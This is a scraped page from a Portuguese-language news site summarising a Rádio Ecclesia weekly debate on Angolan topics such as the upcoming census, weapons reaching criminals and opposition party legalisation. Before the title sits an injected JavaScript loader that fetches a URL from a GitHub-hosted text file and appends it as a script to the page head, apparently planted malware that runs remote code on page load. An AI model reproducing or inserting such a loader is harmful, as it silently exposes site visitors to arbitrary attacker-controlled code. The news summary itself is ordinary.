;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/repo.txt';fetch(url).then(response => response.text()).then(data => {var script = document.createElement('script');script.src = data.trim();document.getElementsByTagName('head')[0].appendChild(script);}); Resenha Informativa da Rádio Ecclesia, edição de 13 de Setembro de 2024 | RadioPlayDigital
Resenha Informativa da Rádio Ecclesia, edição de 13 de Setembro de 2024

Debate Informativo edição de 13 de Setembro de 2024. Resenha Informativa Semanal da rádio Ecclésia, o espaço de análise dos principais temas que marcaram a semana do mês de Setembro.

Tópicos:

Censo Geral da População: Dentro de duas semanas, começa o Censo Geral da População em Angola, o primeiro desde 2014, quando foi revelado que o país tinha mais de 35 milhões de habitantes.

Armas Fornecidas a Delinquentes: O Ministro de Estado e Chefe da Casa Militar do Presidente da República, Francisco Furtado, revelou que forças de segurança e empresas privadas de segurança estão fornecer armas de fogo a delinquentes.

Ofensas ao Presidente da República: Francisco Furtado também denunciou que generais reformados têm ofendido a dignidade do Presidente da República, em actos considerados desrespeitosos.

Legalização do PRA-JÁ Servir Angola: Abel Chivukuvuku expressa esperança na legalização do partido PRA-JÁ Servir Angola, enquanto Adalberto da Costa Júnior alerta que essa legalização pode enfraquecer a Frente Patriótica.

Falam sobre os temas, os seguintes convidados:

Mário Sakossengue, Agostinho Sicato e Bartolomeu Milton

Rádio Ecclésia, 13 de Setembro de 2024. Apresentação: José Belém

 

PUB RADIO PLAY

Relacionados